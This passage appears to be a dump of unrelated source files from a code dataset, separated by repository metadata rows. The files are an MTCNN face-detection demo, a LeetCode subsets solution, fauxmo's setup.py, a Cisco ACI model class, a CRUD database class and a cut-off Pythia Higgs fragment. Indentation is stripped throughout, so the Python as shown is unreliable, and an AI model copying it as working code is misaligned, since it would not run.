#prefix = ["../data/MTCNN_caltech_model/PNet_landmark/PNet", "../data/MTCNN_caltech_model/RNet_landmark/RNet", "../data/MTCNN_caltech_model/ONet_landmark/ONet"]
#person voc[1600,2900,300]
#prefix = ["../data/MTCNN_voc_model/PNet_landmark/PNet", "../data/MTCNN_voc_model/RNet_landmark/RNet", "../data/MTCNN_voc_model/ONet_landmark/ONet"]
print("demo epoch load ",epoch_load)
model_path = ["%s-%s" %(x,y ) for x, y in zip(prefix,epoch_load)]
print("demo model path ",model_path)
return model_path
def process_img():
param = parameter()
min_size = param.min_size
score_threshold = param.threshold
slid_window = param.slid_window
if test_relu==100:
batch_size = [1,1,1]
else:
batch_size = param.batch_size
epoch_load = param.epoch_load
multi_detector = [None,None,None]
#load paramter path
model_path = load_model(epoch_load)
#load net result
if slid_window:
print("using slid window")
Pnet_det = None
return [None,None,None]
else:
Pnet_det = FcnDetector(P_Net,model_path[0])
Rnet_det = Detector(R_Net,data_size=24,batch_size=batch_size[1],model_path=model_path[1])
Onet_det = Detector(O_Net,data_size=48,batch_size=batch_size[2],model_path=model_path[2])
multi_detector = [Pnet_det,Rnet_det,Onet_det]
#get bbox and landmark
Mtcnn_detector = MtcnnDetector(multi_detector,min_size,threshold=score_threshold)
#bboxs,bbox_clib,landmarks = Mtcnn_detector.detect(img)
return Mtcnn_detector
def add_label(img,bbox,landmark):
#print("labe ",bbox.shape)
num = bbox.shape[0]
font = cv2.FONT_HERSHEY_COMPLEX_SMALL
font_scale =1
thickness = 1
for i in range(num):
x1,y1,x2,y2 = int(bbox[i,0]),int(bbox[i,1]),int(bbox[i,2]),int(bbox[i,3])
cv2.rectangle(img,(x1,y1),(x2,y2),(255,0,0),1)
score_label = str('{:.2f}'.format(bbox[i,4]))
size = cv2.getTextSize(score_label, font, font_scale, thickness)[0]
if y1-int(size[1]) <= 0:
cv2.rectangle(img, (x1, y2), (x1 + int(size[0]), y2+int(size[1])), (255, 0, 0))
cv2.putText(img, score_label, (x1,y2+size[1]), font, font_scale, (255, 255, 255), thickness)
else:
cv2.rectangle(img, (x1, y1-int(size[1])), (x1 + int(size[0]), y1), (255, 0, 0))
cv2.putText(img, score_label, (x1,y1), font, font_scale, (255, 255, 255), thickness)
if landmark is not None:
for i in range(landmark.shape[0]):
for j in range(5):
#print(int(landmark[i][2*j]),int(landmark[i][2*j+1]))
cv2.circle(img, (int(landmark[i][2*j]),int(landmark[i][2*j+1])), 2, (0,0,255))
def camera(file_in):
cv2.namedWindow("result")
cv2.moveWindow("result",1400,10)
#camera_cap = cv2.VideoCapture('/home/lxy/Develop/Center_Loss/face_detect/videos/profile_video.wmv')
if file_in =='None':
camera_cap = cv2.VideoCapture(0)
else:
camera_cap = cv2.VideoCapture(file_in)
if not camera_cap.isOpened():
print("failded open camera")
return -1
mtcnn_dec = process_img()
while camera_cap.isOpened():
ret,frame = camera_cap.read()
h,w,_ = frame.shape
if ret:
bbox_clib,landmarks = mtcnn_dec.detect(frame)
print("landmark ",bbox_clib.shape)
if len(bbox_clib):
bbox_clib = board_img(bbox_clib,w,h)
add_label(frame,bbox_clib,landmarks)
if (cv2.waitKey(1)& (0xFF == ord('q'))):
break
cv2.imshow("result",frame)
else:
print("can not find device")
break
camera_cap.release()
cv2.destroyAllWindows()
def demo_img(file_in):
cv2.namedWindow("result")
cv2.moveWindow("result",1400,10)
if file_in =='None':
cv2.destroyAllWindows()
print("please input right path")
return -1
else:
img = cv2.imread(file_in)
mtcnn_dec = process_img()
bbox_clib,landmarks = mtcnn_dec.detect(img)
if len(bbox_clib):
add_label(img,bbox_clib,landmarks)
cv2.imshow("result",img)
cv2.waitKey(0)
def board_img(boxes,wid,height):
#print ('box shape ',np.shape(boxes))
#print boxes
x1,y1,x2,y2 = boxes[:,0],boxes[:,1],boxes[:,2],boxes[:,3],
offset_w = (x2-x1)/5.0
offset_h = (y2-y1)/5.0
x1 -= offset_w
#y1 -= 4*offset_h
x2 += offset_w
y2 += offset_h
x1 = map(int,np.maximum(x1,0))
#y1 = map(int,np.maximum(y1,0))
y1 = int(0)
x2 = map(int,np.minimum(x2,wid-1))
y2 = map(int,np.minimum(y2,height-1))
box = [x1,y1,x2,y2,boxes[:,4]]
#box = [x1,y1,x2,y2]
box = np.asarray(box)
#print("box shape",np.shape(box))
box = np.vstack(box)
return box.T
def GetFaces(file_in):
'''
param = parameter()
min_size = param.min_size
score_threshold = param.threshold
slid_window = param.slid_window
batch_size = param.batch_size
epoch_load = param.epoch_load
multi_detector = [None,None,None]
'''
if file_in =='None':
#cv2.destroyAllWindows()
print("please input right path")
return []
else:
#img = cv2.imread(file_in)
img = file_in
h,w,_ = img.shape
min_size = 24
score_threshold = [0.5,0.7,0.9]
slid_window = False
batch_size = [1,256,16]
#epoch_load = [205,500,200]
epoch_load = [32,2700,25]
multi_detector = [None,None,None]
prefix = ["../../trained_models/MTCNN_bright_model/PNet_landmark/PNet", "../../trained_models/MTCNN_bright_model/RNet_landmark/RNet", "../../trained_models/MTCNN_bright_model/ONet_landmark/ONet"]
print("demo epoch load ",epoch_load)
model_path = ["%s-%s" %(x,y ) for x, y in zip(prefix,epoch_load)]
#load net result
if slid_window:
print("using slid window")
Pnet_det = None
return [None,None,None]
else:
Pnet_det = FcnDetector(P_Net,model_path[0])
Rnet_det = Detector(R_Net,data_size=24,batch_size=batch_size[1],model_path=model_path[1])
Onet_det = Detector(O_Net,data_size=48,batch_size=batch_size[2],model_path=model_path[2])
multi_detector = [Pnet_det,Rnet_det,Onet_det]
#get bbox and landmark
Mtcnn_detector = MtcnnDetector(multi_detector,min_size,threshold=score_threshold)
#bboxs,bbox_clib,landmarks = Mtcnn_detector.detect(img)
bbox_clib,landmarks = Mtcnn_detector.detect(img)
if len(bbox_clib):
bbox_clib =board_img(bbox_clib,w,h)
#add_label(img,bbox_clib,landmarks)
#cv2.imshow("result",img)
#cv2.waitKey(0)
#bbox_clib[:,2] = bbox_clib[:,2] - bbox_clib[:,0]
#bbox_clib[:,3] = bbox_clib[:,3] - bbox_clib[:,1]
#bbox_clib[:,0] = map(int,bbox_clib[:,0])
#bbox_clib[:,1] = map(int,bbox_clib[:,1])
#bbox_clib[:,2] = map(int,bbox_clib[:,2])
#bbox_clib[:,3] = map(int,bbox_clib[:,3])
#bbox_clib = bbox_clib[:,:4]
else:
bbox_clib= np.array([])
landmarks = np.array([])
return bbox_clib
if __name__ == '__main__':
#process_img()
arg = parameter()
file_in = arg.file_in
camera(file_in)
#demo_img(file_in)
#a = get_faces(file_in)
#print(a)
| [
"[email protected]"
] | |
35bad535a079fa4d1c260581d0e8fc3ca1dd433a | 59b72b8f662cd605b3ce31f54779c17e5ca066d0 | /interview_q/leet_code/子集.py | d6aa3df0e62c43481165dd5041958cface2a3827 | [] | no_license | dongyang2/hello-world | c1f5853ccafd6b8f23836192547ab36f898e0891 | 1f859b53e2b21ed5a648da09b84950f03ec1b370 | refs/heads/master | 2022-12-11T22:07:22.853912 | 2022-11-24T03:52:35 | 2022-11-24T03:52:35 | 119,025,960 | 0 | 0 | null | 2018-01-26T10:09:58 | 2018-01-26T08:28:10 | null | UTF-8 | Python | false | false | 2,388 | py | # https://leetcode-cn.com/problems/subsets/
# coding: utf-8
# Python 3
# 给定一组不含重复元素的整数数组,返回该数组所有可能的子集,包括空集。
#
# 思路:直接使用“组合.py”文件的函数。
# 优化方法,观察输入n=10时的结果,发现后面的结果等于输入数组与前面的结果的差集。如,长度为9的子集,一定等于长度为10的子集减长度为1的子集的结果。
# 边界条件:
def erg_new_new(li, k, tmp, com):
n = len(tmp)
if n == k:
com.append(tmp)
else:
for i in range(len(li)):
if n > 0 and li[i] < tmp[-1]:
continue
elif n <= k-1:
# erg_new_new(li[i+1:], k, append_val(tmp, li[i]), com)
erg_new_new(li[i + 1:], k, tmp+[li[i]], com)
def combination(li, k):
n = len(li)
if k > n or k == 0:
return []
if k == 1:
return [[x] for x in li]
if k == n:
return [li]
com = []
erg_new_new(li, k, [], com)
return com
def sub_set(li):
ss = [[[]]]
sorted_li = sorted(li)
n = len(li)
half = int(n/2)
for i in range(1, half+1):
ss.append(combination(sorted_li, i))
if n % 2 == 0:
start_reverse = n-half+1
else:
start_reverse = n-half
for i in range(start_reverse, n+1):
tmp = []
for j in ss[n-i]:
tmp.append(difference(li, j))
ss.append(tmp)
ans = []
for i in ss:
ans += i
return ans
def difference(li, sub_li):
return [x for x in li if x not in sub_li]
def main():
tmp = []
tmp += []
print(tmp)
tmp = [[]]
tmp += [] # 原来Python默认把数组加空数组处理成了不连接(即不会多加一个空数组)
print(tmp)
tmp = [[]]
tmp += [[]] # 想加空数组要这么操作。
print(tmp)
tmp = [[]]
tmp += [[1], [2]]
print(tmp)
li1 = [1, 3, 5, 6]
li2 = [4, 6]
print(difference(li1, li2))
li1 = [1, 3, 5, 6]
li2 = []
print(difference(li1, li2))
n = 20
li = [x+1 for x in range(n)]
# print(combination(li, 5))
print(sub_set(li))
if __name__ == '__main__':
import time
print('-' * 15, 'Start', time.ctime(), '-' * 15, '\n')
main()
print('%s%s %s %s %s' % ('\n', '-' * 16, 'End', time.ctime(), '-' * 16))
| [
"[email protected]"
] | |
e25d5c6d44603dfc1ac7be40c0f5e63bce951fac | 332ac6deaed8b8917cf874f04fc77246378bdb44 | /setup.py | 4db61d01cd37dbb3dd83d18bdb2eb0d4634cfe76 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | hestela/fauxmo | 5a435399eca61c525502dc90333ee73cff0d3d15 | f2246b952a0246bf0dcd74e770c9daea0dcaa763 | refs/heads/master | 2020-03-11T15:45:48.414168 | 2018-04-19T00:56:27 | 2018-04-19T01:08:35 | 130,095,227 | 0 | 0 | null | 2018-04-18T16:58:43 | 2018-04-18T16:58:43 | null | UTF-8 | Python | false | false | 1,755 | py | import re
from setuptools import setup, find_packages
try:
import pypandoc
readme = pypandoc.convert('README.md', 'rst')
history = pypandoc.convert('CHANGELOG.md', 'rst')
except ImportError:
with open('README.md') as readme_file, \
open('CHANGELOG.md') as history_file:
readme = readme_file.read()
history = history_file.read()
with open('requirements-dev.txt') as dev_requirements_file, \
open('requirements-test.txt') as tests_requirements_file:
test_requirements = tests_requirements_file.read().splitlines()
dev_requirements = dev_requirements_file.read().splitlines()
dev_requirements.extend(test_requirements)
version_regex = re.compile(r'__version__ = [\'\"]v((\d+\.?)+)[\'\"]')
with open('src/fauxmo/__init__.py') as f:
vlines = f.readlines()
__version__ = next(re.match(version_regex, line).group(1) for line in vlines
if re.match(version_regex, line))
setup(
name="fauxmo",
version=__version__,
description="Emulated Belkin WeMo devices that work with the Amazon Echo",
long_description=readme + "\n\n" + history,
author="Nathan Henrie",
author_email="[email protected]",
url="https://github.com/n8henrie/fauxmo",
packages=find_packages("src"),
package_dir={"": "src"},
include_package_data=True,
license="MIT",
zip_safe=False,
keywords=["fauxmo", "alexa", "amazon echo"],
classifiers=[
"Natural Language :: English",
"Programming Language :: Python :: 3.6"
],
extras_require={
"dev": dev_requirements
},
test_suite="tests",
tests_require=test_requirements,
entry_points={'console_scripts': ['fauxmo=fauxmo.cli:cli']},
python_requires=">=3.6",
)
| [
"[email protected]"
] | |
5e9b31b9c658c18ee03c3afdab9042716a92b89b | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/vz/ctrctentitydef.py | cf877348cdffddd74f0ba1250b5de389e328ad62 | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 15,939 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class CtrctEntityDef(Mo):
"""
The contract entity definition.
"""
meta = ClassMeta("cobra.model.vz.CtrctEntityDef")
meta.moClassName = "vzCtrctEntityDef"
meta.rnFormat = "entity-[%(epgDn)s]"
meta.category = MoCategory.REGULAR
meta.label = "Summary of EPg: Contains All Info to Create ProvDef/ConsDef"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Counts")
meta.childClasses.add("cobra.model.health.Inst")
meta.childClasses.add("cobra.model.vz.ProvSubjLblDef")
meta.childClasses.add("cobra.model.vz.ProvLblDef")
meta.childClasses.add("cobra.model.vz.ConsCtrctLblDef")
meta.childClasses.add("cobra.model.vz.ConsSubjLblDef")
meta.childClasses.add("cobra.model.telemetry.MatchedSelector")
meta.childClasses.add("cobra.model.l3ext.SubnetDef")
meta.childClasses.add("cobra.model.vz.ProvCtrctLblDef")
meta.childClasses.add("cobra.model.fv.RsEPgDefToL2Dom")
meta.childClasses.add("cobra.model.fv.RsEPgDefToL3Dom")
meta.childClasses.add("cobra.model.vz.ConsLblDef")
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fv.RsEPgDefToL2Dom", "rsEPgDefToL2Dom"))
meta.childNamesAndRnPrefix.append(("cobra.model.fv.RsEPgDefToL3Dom", "rsEPgDefToL3Dom"))
meta.childNamesAndRnPrefix.append(("cobra.model.vz.ConsCtrctLblDef", "cCtrctLblD-"))
meta.childNamesAndRnPrefix.append(("cobra.model.telemetry.MatchedSelector", "matchedSel-"))
meta.childNamesAndRnPrefix.append(("cobra.model.vz.ProvCtrctLblDef", "pCtrctLblD-"))
meta.childNamesAndRnPrefix.append(("cobra.model.vz.ProvSubjLblDef", "pSubjLblD-"))
meta.childNamesAndRnPrefix.append(("cobra.model.vz.ConsSubjLblDef", "cSubjLblD-"))
meta.childNamesAndRnPrefix.append(("cobra.model.l3ext.SubnetDef", "extsubnet-"))
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Counts", "fltCnts"))
meta.childNamesAndRnPrefix.append(("cobra.model.health.Inst", "health"))
meta.childNamesAndRnPrefix.append(("cobra.model.vz.ProvLblDef", "pLblD-"))
meta.childNamesAndRnPrefix.append(("cobra.model.vz.ConsLblDef", "cLblD-"))
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.parentClasses.add("cobra.model.vz.DirAssDef")
meta.parentClasses.add("cobra.model.vz.IntDef")
meta.parentClasses.add("cobra.model.fv.CtxDef")
meta.parentClasses.add("cobra.model.vz.SubjDef")
meta.parentClasses.add("cobra.model.vz.IntraEPgDef")
meta.parentClasses.add("cobra.model.vz.InheritedDef")
meta.parentClasses.add("cobra.model.vz.EpgAnyDef")
meta.superClasses.add("cobra.model.fv.EPgDef")
meta.superClasses.add("cobra.model.vz.ACtrctEpgDef")
meta.superClasses.add("cobra.model.fv.AEPgDef")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.pol.Def")
meta.superClasses.add("cobra.model.fv.EPgCont")
meta.rnPrefixes = [
('entity-', True),
]
prop = PropMeta("str", "anyDn", "anyDn", 16600, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("anyDn", prop)
prop = PropMeta("str", "bdDefDn", "bdDefDn", 1811, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("bdDefDn", prop)
prop = PropMeta("str", "bdDefStQual", "bdDefStQual", 1812, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "none"
prop._addConstant("default-target", "default-target", 2)
prop._addConstant("mismatch-target", "mismatch-target", 1)
prop._addConstant("none", "none", 0)
meta.props.add("bdDefStQual", prop)
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "ctrctUpd", "ctrctUpd", 1078, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "ctrct"
prop._addConstant("ctrct", "ctrct", 0)
prop._addConstant("epg", "epg", 1)
prop._addConstant("not_defined", "not_defined", 0)
meta.props.add("ctrctUpd", prop)
prop = PropMeta("str", "ctxDefDn", "ctxDefDn", 1813, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("ctxDefDn", prop)
prop = PropMeta("str", "ctxDefStQual", "ctxDefStQual", 1814, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "none"
prop._addConstant("default-target", "default-target", 2)
prop._addConstant("mismatch-target", "mismatch-target", 1)
prop._addConstant("none", "none", 0)
meta.props.add("ctxDefStQual", prop)
prop = PropMeta("str", "ctxPcTag", "ctxPcTag", 15850, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("any", "any", 0)
meta.props.add("ctxPcTag", prop)
prop = PropMeta("str", "ctxSeg", "ctxSeg", 1809, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("ctxSeg", prop)
prop = PropMeta("str", "descr", "descr", 5579, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "epgDn", "epgDn", 16150, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
meta.props.add("epgDn", prop)
prop = PropMeta("str", "exceptionTag", "exceptionTag", 37059, PropCategory.REGULAR)
prop.label = "Contract Exception Tag"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 512)]
meta.props.add("exceptionTag", prop)
prop = PropMeta("str", "isAny", "isAny", 1077, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("isAny", prop)
prop = PropMeta("str", "l3CtxEncap", "l3CtxEncap", 1815, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("l3CtxEncap", prop)
prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "monPolDn", "monPolDn", 16152, PropCategory.REGULAR)
prop.label = "Monitoring policy attached to this observable object"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("monPolDn", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerKey", prop)
prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerTag", prop)
prop = PropMeta("str", "pcEnfPref", "pcEnfPref", 16336, PropCategory.REGULAR)
prop.label = "Policy Control Enforcement"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 1
prop.defaultValueStr = "enforced"
prop._addConstant("enforced", "enforced", 1)
prop._addConstant("unenforced", "unenforced", 2)
meta.props.add("pcEnfPref", prop)
prop = PropMeta("str", "pcTag", "pcTag", 1808, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("any", "any", 0)
meta.props.add("pcTag", prop)
prop = PropMeta("str", "prefGrMemb", "prefGrMemb", 27676, PropCategory.REGULAR)
prop.label = "Preferred Group Member"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 2
prop.defaultValueStr = "exclude"
prop._addConstant("exclude", "exclude", 2)
prop._addConstant("include", "include", 1)
meta.props.add("prefGrMemb", prop)
prop = PropMeta("str", "prio", "prio", 1076, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 9)]
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("level1", "level1", 3)
prop._addConstant("level2", "level2", 2)
prop._addConstant("level3", "level3-(default)", 1)
prop._addConstant("level4", "level4", 9)
prop._addConstant("level5", "level5", 8)
prop._addConstant("level6", "level6", 7)
prop._addConstant("unspecified", "unspecified", 0)
meta.props.add("prio", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "scopeId", "scopeId", 1810, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(1, 16777215)]
prop.defaultValue = 1
prop.defaultValueStr = "1"
meta.props.add("scopeId", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "targetDscp", "targetDscp", 16092, PropCategory.REGULAR)
prop.label = "Dscp Value"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.defaultValue = 64
prop.defaultValueStr = "unspecified"
prop._addConstant("AF11", "af11-low-drop", 10)
prop._addConstant("AF12", "af12-medium-drop", 12)
prop._addConstant("AF13", "af13-high-drop", 14)
prop._addConstant("AF21", "af21-low-drop", 18)
prop._addConstant("AF22", "af22-medium-drop", 20)
prop._addConstant("AF23", "af23-high-drop", 22)
prop._addConstant("AF31", "af31-low-drop", 26)
prop._addConstant("AF32", "af32-medium-drop", 28)
prop._addConstant("AF33", "af33-high-drop", 30)
prop._addConstant("AF41", "af41-low-drop", 34)
prop._addConstant("AF42", "af42-medium-drop", 36)
prop._addConstant("AF43", "af43-high-drop", 38)
prop._addConstant("CS0", "cs0", 0)
prop._addConstant("CS1", "cs1", 8)
prop._addConstant("CS2", "cs2", 16)
prop._addConstant("CS3", "cs3", 24)
prop._addConstant("CS4", "cs4", 32)
prop._addConstant("CS5", "cs5", 40)
prop._addConstant("CS6", "cs6", 48)
prop._addConstant("CS7", "cs7", 56)
prop._addConstant("EF", "expedited-forwarding", 46)
prop._addConstant("VA", "voice-admit", 44)
prop._addConstant("unspecified", "unspecified", 64)
meta.props.add("targetDscp", prop)
prop = PropMeta("str", "txId", "txId", 21190, PropCategory.REGULAR)
prop.label = "Transaction Id when EPg was created"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("txId", prop)
prop = PropMeta("str", "useAnyDef", "useAnyDef", 17558, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("useAnyDef", prop)
meta.namingProps.append(getattr(meta.props, "epgDn"))
getattr(meta.props, "epgDn").needDelimiter = True
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Ancestor"
meta.deploymentQueryPaths.append(DeploymentPathMeta("CtrctIfToEPgCons", "Contract Interface EPG Consumer", "cobra.model.fv.EPg"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("CtrctIfToEPgConsNwIf", "Contract Interface EPG Consumer Interface", "cobra.model.nw.If"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("ABrCPToAnyProv", "Any To Provider", "cobra.model.nw.If"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("ABrCPToAnyCons", "Any To Consumer", "cobra.model.nw.If"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("ABrCPToEPgProv", "EPG Provider", "cobra.model.nw.If"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("ABrCPToEPgCons", "EPG Consumer", "cobra.model.nw.If"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("GraphInstancesinacontract", "Graph Instances", "cobra.model.vns.GraphInst"))
def __init__(self, parentMoOrDn, epgDn, markDirty=True, **creationProps):
namingVals = [epgDn]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
8f2804428b63e25c8e704fb9def3a459ee42e87d | 3b1053429de896731fe659b8ea09efe5f8bdc4cb | /src/db/DBStpHardware.py | 902519e353ffa62e3425ec8e2b8cb150f10325d0 | [] | no_license | rajgu/machine-master | 57bb6f05fce5dfa512ecd10bc5e7bb31bbd76b8a | f1a6081c9bfde1937341a1a55478c08d48005f05 | refs/heads/master | 2020-03-26T22:09:14.058722 | 2018-08-20T15:42:00 | 2018-08-20T15:42:00 | 145,435,570 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,012 | py | from src.db.Crud import Crud
class DBStpHardware(Crud):
_table_name = 'stp_hardware'
_table_struct = {
'stp_id' : {'type' : 'integer', 'validate' : True},
'type' : {'type' : 'text', 'validate' : True},
'name' : {'type' : 'text', 'validate' : True},
'serial_number': {'type' : 'text', 'validate' : True},
'location' : {'type' : 'text', 'validate' : True}
}
_horizontal_key = False
def __init__(self, db):
return Crud.__init__(self, db)
def create(self, data):
return Crud.create(self, data, self._table_name, self._table_struct, self._horizontal_key)
def read(self, data, oldata=False):
return Crud.read(self, data, self._table_name, self._table_struct, self._horizontal_key, oldata)
def update(self, data, where):
return Crud.update(self, data, where, self._table_name, self._table_struct, self._horizontal_key)
def delete(self, data):
return Crud.delete(self, data, self._table_name, self._table_struct, self._horizontal_key)
| [
"="
] | = |
d57266dab8d5af22860b6ec60667e9dc907af33f | 0fccee4c738449f5e0a8f52ea5acabf51db0e910 | /genfragments/ThirteenTeV/MSSM_HiggsToMuMu/fragment_mhmodp_MA400_tb20_bbH.py | 29e5b0fcac451a27f7c6bbc2d0d18d8dbe8f4c9b | [] | no_license | cms-sw/genproductions | f308ffaf3586c19b29853db40e6d662e937940ff | dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4 | refs/heads/master | 2023-08-30T17:26:02.581596 | 2023-08-29T14:53:43 | 2023-08-29T14:53:43 | 11,424,867 | 69 | 987 | null | 2023-09-14T12:41:28 | 2013-07-15T14:18:33 | Python | UTF-8 | Python | false | false | 18,020 | py | COM_ENERGY = 13000.0 # GeV
CROSS_SECTION = 1 # pb
PROCESS = 'HiggsBSM:gg2H2bbbar = on'
SLHA_TABLE = """BLOCK SPINFO
1 FeynHiggs
2 2.12.0
2 built on ott 13, 2016
BLOCK MODSEL
1 0 # Model
2 1 # GridPts
3 0 # Content
4 0 # RPV
5 0 # CPV
6 0 # FV
BLOCK SMINPUTS
1 1.28952828E+02 # invAlfaMZ
2 1.16637000E-05 # GF
3 1.19000000E-01 # AlfasMZ
4 9.11876000E+01 # MZ
5 4.16000000E+00 # Mb
6 1.73200000E+02 # Mt
7 1.77703000E+00 # Mtau
11 5.10998902E-04 # Me
13 1.05658357E-01 # Mmu
21 6.00000000E-03 # Md
22 3.00000000E-03 # Mu
23 9.50000000E-02 # Ms
